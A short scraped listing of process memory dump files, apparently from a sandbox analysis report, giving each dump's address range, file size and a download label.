memory/4652-126-0x0000000007C80000-0x0000000007CE6000-memory.dmp

Filesize
408KB

Download
memory/4652-189-0x0000000072C90000-0x000000007337E000-memory.dmp

Filesize
6.9MB

Download
memory/4652-18-0x0000000004DE0000-0x0000000004DF0000-memory.dmp

Filesize
64KB

Download
memory/4652-97-0x0000000007CF0000-0x0000000007D56000-memory.dmp

Filesize
408KB

Download
memory/4652-25-0x0000000007470000-0x0000000007A98000-memory.dmp

Filesize
6.2MB

Download
memory/4652-17-0x0000000072C90000-0x000000007337E000-memory.dmp

Filesize
6.9MB

Download
memory/4916-42-0x0000000000400000-0x000000000041A000-memory.dmp

Filesize
104KB

Download
memory/5104-52-0x0000000000400000-0x000000000040D000-memory.dmp

Filesize
52KB

Download